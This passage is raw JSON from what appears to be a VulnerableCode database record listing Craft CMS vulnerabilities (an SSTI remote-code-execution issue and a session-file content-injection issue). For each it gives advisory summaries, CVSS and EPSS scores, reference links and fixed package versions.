":"https://github.com/craftcms/cms/commit/96c60d775c644ff0a0276da52fe29e11d4cd38d2"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.16.18","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/releases/tag/4.16.18"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.8.22","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-10T15:32:10Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/5.8.22"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25495","reference_id":"CVE-2026-25495","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25495"},{"reference_url":"https://github.com/advisories/GHSA-2453-mppf-46cj","reference_id":"GHSA-2453-mppf-46cj","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2453-mppf-46cj"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-2453-mppf-46cj","reference_id":"GHSA-2453-mppf-46cj","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-02-10T15:32:10Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-2453-mppf-46cj"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73947?format=json","purl":"pkg:composer/craftcms/cms@4.16.18","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.16.18"},{"url":"http://public2.vulnerablecode.io/api/packages/73946?format=json","purl":"pkg:composer/craftcms/cms@5.8.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.22"}],"aliases":["CVE-2026-25495","GHSA-2453-mppf-46cj"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jeyh-3jxd-z3g6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/57249?format=json","vulnerability_id":"VCID-jsfs-azcs-mfcm","summary":"Craft CMS Contains a Potential Remote Code Execution Vulnerability via Twig SSTI\nCraft CMS contains a potential remote code execution vulnerability via Twig SSTI. You must have administrator access and `ALLOW_ADMIN_CHANGES` must be enabled for this to work.\n\nhttps://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production\n\nNote: This is a follow-up to https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv\n\nUsers should update to the patched versions (4.14.13 and 5.6.15) to mitigate the issue.","references":[{"reference_url":"http://github.com/craftcms/cms/pull/17026","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://github.com/craftcms/cms/pull/17026"},{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-46731","reference_id":"","reference_type":"","scores":[{"value":"0.00909","scoring_system":"epss","scoring_elements":"0.76214","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-46731"},{"reference_url":"https://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-46731","reference_id":"CVE-2025-46731","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-46731"},{"reference_url":"https://github.com/advisories/GHSA-7c58-g782-9j38","reference_id":"GHSA-7c58-g782-9j38","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-7c58-g782-9j38"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-7c58-g782-9j38","reference_id":"GHSA-7c58-g782-9j38","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-7c58-g782-9j38"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv","reference_id":"GHSA-f3cw-hg6r-chfv","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/85040?format=json","purl":"pkg:composer/craftcms/cms@4.14.13","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1468-4fdx-kbfr"},{"vulnerability":"VCID-1mb5-28xp-ckd2"},{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5mnd-qvaq-k3am"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-7y4f-ef7t-47eb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-dbcz-erbe-u7dt"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-h6t5-pdp5-8qhe"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jxet-d8ux-mkge"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qq68-3j4y-47am"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rb7c-3nkc-gkeg"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.14.13"},{"url":"http://public2.vulnerablecode.io/api/packages/85041?format=json","purl":"pkg:composer/craftcms/cms@5.6.15","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1468-4fdx-kbfr"},{"vulnerability":"VCID-1mb5-28xp-ckd2"},{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5mnd-qvaq-k3am"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-7y4f-ef7t-47eb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-dbcz-erbe-u7dt"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-h6t5-pdp5-8qhe"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxet-d8ux-mkge"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qq68-3j4y-47am"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rb7c-3nkc-gkeg"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.6.15"}],"aliases":["CVE-2025-46731","GHSA-7c58-g782-9j38"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jsfs-azcs-mfcm"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/57273?format=json","vulnerability_id":"VCID-jxet-d8ux-mkge","summary":"Craft CMS stores arbitrary content provided by unauthenticated users in session files. This content could be accessed and executed, possibly using an independent vulnerability. Craft CMS redirects requests that require authentication to the login page and generates a session file on the server at `/var/lib/php/sessions`. Such session files are named `sess_[session_value]`, where `[session_value]` is provided to the client in a `Set-Cookie` response header. Craft CMS stores the return URL requested by the client without sanitizing parameters. Consequently, an unauthenticated client can introduce arbitrary values, such as PHP code, to a known local file location on the server. Craft CMS versions 5.7.5 and 4.15.3 have been released to address this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-35939","reference_id":"","reference_type":"","scores":[{"value":"0.33065","scoring_system":"epss","scoring_elements":"0.96993","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-35939"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:A"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/e4c7bac8f31010aee048409f9ef6f744a83146b2","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:A"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/commit/e4c7bac8f31010aee048409f9ef6f744a83146b2"},{"reference_url":"https://github.com/craftcms/cms/pull/17220","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:A"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:P/P:M/B:A/M:M/D:A/2025-05-07T22:40:17Z/"},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:P/P:M/B:A/M:M/D:A/2025-06-06T03:55:25Z/"}],"url":"https://github.com/craftcms/cms/pull/17220"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.15.3","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:A"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:P/P:M/B:A/M:M/D:A/2025-05-07T22:40:17Z/"},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:P/P:M/B:A/M:M/D:A/2025-06-06T03:55:25Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/4.15.3"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/5.7.5","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:A"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:P/P:M/B:A/M:M/D:A/2025-06-06T03:55:25Z/"},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:P/P:M/B:A/M:M/D:A/2025-05-07T22:40:17Z/"}],"url":"https://github.com/craftcms/cms/releases/tag/5.7.5"},{"reference_url":"https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2025/va-25-147-01.json","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:A"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:P/P:M/B:A/M:M/D:A/2025-05-07T22:40:17Z/"},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:P/P:M/B:A/M:M/D:A/2025-06-06T03:55:25Z/"}],"url":"https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2025/va-25-147-01.json"},{"reference_url":"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-35939","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:A"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-35939"},{"reference_url":"https://www.cve.org/CVERecord?id=CVE-2025-35939","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:H"},{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:A"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:P/P:M/B:A/M:M/D:A/2025-06-06T03:55:25Z/"},{"value":"Attend","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:A/A:Y/T:P/P:M/B:A/M:M/D:A/2025-05-07T22:40:17Z/"}],"url":"https://www.cve.org/CVERecord?id=CVE-2025-35939"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-35939","reference_id":"CVE-2025-35939","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N/E:H"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:A"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-35939"},{"reference_url":"https://github.com/advisories/GHSA-7vrx-9684-xrf2","reference_id":"GHSA-7vrx-9684-xrf2","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-7vrx-9684-xrf2"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74788?format=json","purl":"pkg:composer/craftcms/cms@4.15.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1468-4fdx-kbfr"},{"vulnerability":"VCID-1mb5-28xp-ckd2"},{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5mnd-qvaq-k3am"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-7y4f-ef7t-47eb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-dbcz-erbe-u7dt"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-h6t5-pdp5-8qhe"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rb7c-3nkc-gkeg"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@4.15.3"},{"url":"http://public2.vulnerablecode.io/api/packages/74789?format=json","purl":"pkg:composer/craftcms/cms@5.7.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1468-4fdx-kbfr"},{"vulnerability":"VCID-1mb5-28xp-ckd2"},{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5mnd-qvaq-k3am"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerab